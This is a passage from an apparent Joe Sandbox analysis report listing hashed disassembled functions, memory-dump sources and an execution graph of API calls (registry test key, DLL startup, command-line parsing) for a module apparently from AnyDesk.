                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7b7a913e012ef15b007e26946e8789bd29f2036101ee2a1bf631eeca4b5da047
                                                                                                                                                                                                                                                  • Instruction ID: 33e2819d30f96827955b551a3bd1105135cead2d9387f81953deabbf0c1b5e3b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b7a913e012ef15b007e26946e8789bd29f2036101ee2a1bf631eeca4b5da047
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CD18030B503049FEB409F68C894B6E7BA6FF89708F508459EA029B3E1CBB5DD45DB91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065A35B3 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9fbd4a16db3c79775835833f61a9df980f6ccfcb8fb8a6bff7479c2eb5b9c4d1
                                                                                                                                                                                                                                                  • Instruction ID: e03133233b53b57d739db0e3c607fd5bfefc760dbd366d30f587240f533f62c6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fbd4a16db3c79775835833f61a9df980f6ccfcb8fb8a6bff7479c2eb5b9c4d1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3214835B40104AFCB54CF69D984EAABBB2FF88714F1184A9ED059B365DA31EC46CB11
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 015FD764 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803527071.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_15fd000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2b96403d59df6dfcce382f6e7cbebb16d5329400b738d91b039c10442d625eb5
                                                                                                                                                                                                                                                  • Instruction ID: ad17347d489a5258356759f8462b5b0d567ce6c6c324ac226b7509df05f9c45f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b96403d59df6dfcce382f6e7cbebb16d5329400b738d91b039c10442d625eb5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6821E272500240DFCB059F94D9C0B2ABFB5FB88314F24C66DEA094E256C33AD416CBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 015FD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803527071.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_15fd000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b7866e2c3fd84f5b25e1017588505f512746866edfd88370302b733614e8952a
                                                                                                                                                                                                                                                  • Instruction ID: 9c20833efb79a3ae4f67dcdd78c723d3f9cee2a8698d64a1fab6ed12178943d9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7866e2c3fd84f5b25e1017588505f512746866edfd88370302b733614e8952a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B72100B1500240DFDB05DF98D9C8B2ABFB5FB88318F20C56DEA090F256C336D456CAA2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 0160D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803742474.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_160d000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 14dad1a8db1540d4771d7d6d0c088fcf3ce4e116770e37df0463c297e9e65d82
                                                                                                                                                                                                                                                  • Instruction ID: 0a16a1a4de45bf73214af977c28473af819d825d58e3f2a8e5ca0779ddab8180
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14dad1a8db1540d4771d7d6d0c088fcf3ce4e116770e37df0463c297e9e65d82
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A621F271604200DFDB1ADF98D984B27BFA5EB84354F20C66DD94E4B396C33AD447CA61
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065A0FD0 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828848519.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_65a0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: a1e35104bd114d30256966f952fae2b20b76a83b21fbb58f8171290875a872f6
                                                                                                                                                                                                                                                  • Instruction ID: 6dfe74850dab87896c8689bdeed1d99988f4a5c84f444b717ff524829c3cddf2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1e35104bd114d30256966f952fae2b20b76a83b21fbb58f8171290875a872f6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D621CF30B00641DFDB949B69D94486EB7E6FFC8210B25856AE91A8B2A1CF70DC11CBA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 0160D006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803742474.000000000160D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0160D000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_160d000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e1e8ea0ca924883b624ebab9c525c01c7332a6e753d551a4894887f87d90962c
                                                                                                                                                                                                                                                  • Instruction ID: 71753c6a7fa1eb688280027d5117c41792202db6d0de4875dff435ecc23bf5ce
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1e8ea0ca924883b624ebab9c525c01c7332a6e753d551a4894887f87d90962c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7421A4755093808FDB07CF64D994716BF71EB46214F28C6DAD8498F6A7C33A980ACB62
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 015FD75F Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803527071.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_15fd000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                                                                                                                                                                                  • Instruction ID: d4b51f60cf6e3678cb05dc4cc5593cefd4534ddebf3c11597539dcb84981ea96
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9216A76504280DFDB16CF54D984B1ABF72FB88314F24C6A9DA490A256C33AD42ACB91
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 015FD4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803527071.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_15fd000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                                                  • Instruction ID: 44a1206c9fcd37ff8e7f86410318672e6e36afbf540fd5ea981f9b2b77aaf62c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA119D76504280CFDB16CF54D5C4B1ABF72FB84218F24C6A9D9490F656C33AD45ACBA2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 015FD655 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803527071.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_15fd000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 53c1a7695b70d32a6540f5749119fda75d1230522d3b9fa4cea25f92db9adbba
                                                                                                                                                                                                                                                  • Instruction ID: f062891f746f5b08c819f46d887cae4a15154f824debf102d24e37fcfe9fbf29
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53c1a7695b70d32a6540f5749119fda75d1230522d3b9fa4cea25f92db9adbba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A101A7711083449AE7119B59CE8476BBFF8FF45324F18C82EEE0D4E296C679D840CAB1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 015FD654 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1803527071.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_15fd000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1dac1f7088a6729d5e0b3206f30c832426ab640a9181509cf369afe948817ca5
                                                                                                                                                                                                                                                  • Instruction ID: c8bc9e9a1d92d78d3a259a9410ad9a63b4a664501cc5c2c1df2bc7c7578191ac
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1dac1f7088a6729d5e0b3206f30c832426ab640a9181509cf369afe948817ca5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2F062724043449AE7119E1ACDC4B66FFA8EB45624F18C45AEE0C4E296C2799844CAB1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 065423B0 Relevance: 2.7, Strings: 2, Instructions: 202COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: $^q$$^q
                                                                                                                                                                                                                                                  • API String ID: 0-355816377
                                                                                                                                                                                                                                                  • Opcode ID: 025bcba5da30811a03ea08d3932204c6dc1a72dcf0ad40070a16e805e6cf6a94
                                                                                                                                                                                                                                                  • Instruction ID: 7d630e4c220570eb8413527e8c9fda0b86653ce41db54bbd6bbfdbb75778392a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 025bcba5da30811a03ea08d3932204c6dc1a72dcf0ad40070a16e805e6cf6a94
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A961A174E01218DFDB44EFA9C884ADDBBB2FF89300F249069E515BB264DB34A946CF54
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06542681 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.1828724071.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_6540000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 80703d8a2c63e9731be64b1b14341ebdecfd7aadf1ba551d4a768b9e13d6b84e
                                                                                                                                                                                                                                                  • Instruction ID: 3ee4b43ed9d740b3803915ef2740e85e5e30b1716ac046aa2c5b93ead4a0ed77
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80703d8a2c63e9731be64b1b14341ebdecfd7aadf1ba551d4a768b9e13d6b84e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81015A34E063189FCB50DF84D8409EDB7B9FB4A355F105196E519AB361CB349E00CFA0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:0.4%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:1.6%
                                                                                                                                                                                                                                                  Total number of Nodes:129
                                                                                                                                                                                                                                                  Total number of Limit Nodes:5
                                                                                                                                                                                                                                                  execution_graph 33426 69c5fe51 33441 69c5f564 33426->33441 33431 69c5f4a3 4 API calls 33432 69c5fe83 33431->33432 33438 69c5fe9a 33432->33438 33455 69c5f787 RegCreateKeyExW 33432->33455 33434 69c5feb3 33464 69c5eefe 62 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 33434->33464 33436 69c5fec4 33438->33434 33438->33436 33439 69c5febb 33439->33436 33465 69c420b0 33441->33465 33444 69c5f5ad 33467 69c40c5d 33444->33467 33446 69c5f5c8 33447 69c5f4a3 33446->33447 33448 69c5f4b2 33447->33448 33475 69c340d0 RegOpenKeyExW 33448->33475 33451 69c5f4d8 33480 69c33f80 33451->33480 33456 69c5f7d5 lstrlenW RegSetValueExW 33455->33456 33457 69c5f81b 33455->33457 33458 69c5f7f5 RegDeleteValueW 33456->33458 33459 69c5f804 RegCloseKey 33456->33459 33460 69c40c5d __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33457->33460 33458->33459 33459->33457 33461 69c5f813 RegDeleteKeyW 33459->33461 33462 69c5f82a 33460->33462 33461->33457 33462->33438 33463 69c5f711 8 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 33462->33463 33463->33438 33464->33439 33466 69c420c7 GetVersionExW 33465->33466 33466->33444 33468 69c40c66 33467->33468 33469 69c40c68 IsProcessorFeaturePresent 33467->33469 33468->33446 33471 69c40fff 33469->33471 33474 69c40fc3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33471->33474 33473 69c410e2 33473->33446 33474->33473 33476 69c34109 33475->33476 33477 69c3411b 33475->33477 33476->33477 33478 69c3410f RegCloseKey 33476->33478 33477->33451 33479 69c34140 RegQueryValueExW 33477->33479 33478->33477 33479->33451 33481 69c33f89 RegCloseKey 33480->33481 33482 69c33f9d 33480->33482 33481->33482 33482->33431 33483 69c40c3a 33484 69c40c43 33483->33484 33485 69c40c48 33483->33485 33506 69c413d5 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 33484->33506 33489 69c40af4 33485->33489 33488 69c40c56 33490 69c40b00 CallCatchBlock 33489->33490 33491 69c40b29 dllmain_raw 33490->33491 33492 69c40b24 33490->33492 33494 69c40b0f CallCatchBlock 33490->33494 33493 69c40b43 dllmain_crt_dispatch 33491->33493 33491->33494 33495 69c40b65 33492->33495 33522 69c4515e 12 API calls 2 library calls 33492->33522 33493->33492 33493->33494 33494->33488 33507 69c3ef28 33495->33507 33498 69c40b70 33499 69c40b9c 33498->33499 33503 69c3ef28 __DllMainCRTStartup@12 92 API calls 33498->33503 33500 69c40baf 33499->33500 33523 69c451fa 12 API calls 2 library calls 33499->33523 33500->33494 33502 69c40bb9 dllmain_crt_dispatch 33500->33502 33502->33494 33505 69c40bcc dllmain_raw 33502->33505 33504 69c40b88 dllmain_crt_dispatch dllmain_raw 33503->33504 33504->33499 33505->33494 33506->33485 33508 69c3ef35 33507->33508 33509 69c3ef7b 33507->33509 33524 69c408da 33508->33524 33510 69c3ef97 33509->33510 33550 69c28b20 11 API calls __DllMainCRTStartup@12 33509->33550 33510->33498 33514 69c3ef86 33514->33510 33551 69c27b40 84 API calls __DllMainCRTStartup@12 33514->33551 33515 69c3ef4a 33531 69c28a90 33515->33531 33519 69c3ef5e __DllMainCRTStartup@12 33549 69c220b0 87 API calls 4 library calls 33519->33549 33521 69c3ef78 33521->33510 33522->33495 33523->33500 33526 69c408df 33524->33526 33527 69c3ef3c 33526->33527 33552 69c3f02e 33526->33552 33557 69c4b48e 7 API calls 2 library calls 33526->33557 33558 69c413b8 RaiseException __CxxThrowException@8 new 33526->33558 33559 69c4139b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 33526->33559 33527->33515 33548 69c27ab0 15 API calls 2 library calls 33527->33548 33532 69c28abe 33531->33532 33533 69c28aad 33531->33533 33535 69c408da new 9 API calls 33532->33535 33534 69c40c5d __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33533->33534 33536 69c28aba 33534->33536 33537 69c28ac5 33535->33537 33536->33519 33562 69c28800 33537->33562 33541 69c28ae6 33585 69c295b0 33541->33585 33544 69c28b0e 33546 69c40c5d __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33544->33546 33547 69c28b1b 33546->33547 33547->33519 33548->33515 33549->33521 33550->33514 33551->33510 33554 69c3f033 33552->33554 33555 69c3f061 33554->33555 33560 69c4b4d2 EnterCriticalSection LeaveCriticalSection _abort CallCatchBlock new 33554->33560 33561 69c3efaf HeapAlloc std::locale::_Locimp::_Locimp_dtor 33554->33561 33555->33526 33557->33526 33560->33554 33561->33554 33563 69c408da new 9 API calls 33562->33563 33564 69c2881e 33563->33564 33565 69c288c4 33564->33565 33566 69c2882b 33564->33566 33598 69c46166 11 API calls __Getctype 33565->33598 33568 69c408da new 9 API calls 33566->33568 33570 69c2885a 33568->33570 33569 69c288c9 33599 69c46166 11 API calls __Getctype 33569->33599 33570->33569 33572 69c28861 33570->33572 33576 69c408da new 9 API calls 33572->33576 33573 69c28893 33577 69c2889a GetCommandLineW 33573->33577 33600 69c46166 11 API calls __Getctype 33573->33600 33576->33573 33578 69c22ea0 33577->33578 33579 69c22ed3 33578->33579 33580 69c22ec1 33578->33580 33602 69c24870 31 API calls 3 library calls 33579->33602 33601 69c24870 31 API calls 3 library calls 33580->33601 33582 69c22ecc 33582->33541 33584 69c22ef9 33584->33541 33586 69c295f2 33585->33586 33586->33586 33603 69c2c5a0 31 API calls 3 library calls 33586->33603 33588 69c29618 33589 69c29622 CommandLineToArgvW 33588->33589 33591 69c29659 33588->33591 33604 69c28b80 82 API calls 3 library calls 33589->33604 33592 69c29671 33591->33592 33605 69c26a20 11 API calls __DllMainCRTStartup@12 33591->33605 33595 69c40c5d __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 33592->33595 33593 69c29652 LocalFree 33593->33591 33596 69c28af6 33595->33596 33596->33544 33597 69c26a20 11 API calls __DllMainCRTStartup@12 33596->33597 33597->33544 33601->33582 33602->33584 33603->33588 33604->33593 33605->33592

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 69C5F787 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 68registrystringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RegCreateKeyExW.KERNEL32(80000002,Software\Google\GCAPITemp,00000000,00000000,00000000,0002021F,00000000,?,?,?,00000000,00000000), ref: 69C5F7CB
                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,00000000), ref: 69C5F7D9
                                                                                                                                                                                                                                                  • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000000,?,00000000,00000000), ref: 69C5F7EB
                                                                                                                                                                                                                                                  • RegDeleteValueW.KERNEL32(?,?,?,00000000,00000000), ref: 69C5F7FE
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000), ref: 69C5F807
                                                                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(80000002,Software\Google\GCAPITemp), ref: 69C5F815
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DeleteValue$CloseCreatelstrlen
                                                                                                                                                                                                                                                  • String ID: Software\Google\GCAPITemp$test
                                                                                                                                                                                                                                                  • API String ID: 495649648-3707622476
                                                                                                                                                                                                                                                  • Opcode ID: f76cd66e646c4becc2719c9c11448770395680c246b1b435d680d2454d2b2ce2
                                                                                                                                                                                                                                                  • Instruction ID: 590ea218f49974408e9f82fca02006f61ce515897b4db7851b0c5f82da9b2fa5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f76cd66e646c4becc2719c9c11448770395680c246b1b435d680d2454d2b2ce2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4115E7190022DAFDB00DF95DD89DFFBB7DFB46751B900429F506A6100E6315E058BB1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C40AF4 Relevance: 9.1, APIs: 6, Instructions: 93COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: dllmain_crt_dispatchdllmain_raw
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1382799047-0
                                                                                                                                                                                                                                                  • Opcode ID: c38b8f6560b2fb78b16d2c313a63c7083990a9a8c2fed2a9b666370fb4fd0ae7
                                                                                                                                                                                                                                                  • Instruction ID: 330b803584c1303aaa6ae76a7ddd8e1c0a6503fdec4b37b47ab387ac5be77932
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c38b8f6560b2fb78b16d2c313a63c7083990a9a8c2fed2a9b666370fb4fd0ae7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B721D576F80765ABDB21DE64AD40D6F3A39BFA5F58B015908FC142B141E334C8108BA0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C28A90 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • new.LIBCMT ref: 69C28AC0
